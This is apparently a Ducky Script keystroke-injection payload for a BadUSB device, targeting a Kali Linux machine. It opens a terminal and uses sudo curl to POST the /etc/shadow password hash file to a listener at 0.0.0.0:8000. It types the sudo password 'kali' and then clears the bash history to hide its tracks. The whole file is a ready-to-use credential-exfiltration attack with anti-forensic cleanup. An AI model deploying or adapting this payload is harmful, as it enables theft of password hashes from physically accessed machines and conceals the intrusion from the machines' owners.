REM /etc/shadow wxfiltration
REM Open a terminal window
DELAY 200
ALT F2
DELAY 500
STRING qterminal
DELAY 200
ENTER

REM Enter a bash session from the terminal, which launches as zsh
DELAY 1500
STRING bash
DELAY 200
ENTER

REM Send a POST request with the /etc/shadow file to the listener
STRING sudo curl -X POST -d @"/etc/shadow" http://0.0.0.0:8000/
DELAY 200
ENTER
DELAY 200

REM Access to /etc/shadow does require root privileges, so the password is typed in
STRING kali
DELAY 200
ENTER
DELAY 200

REM The bash history is cleared, the bash session is exited, then the terminal is closed
STRING history -c && exit
DELAY 200
ENTER
STRING exit
DELAY 200
ENTER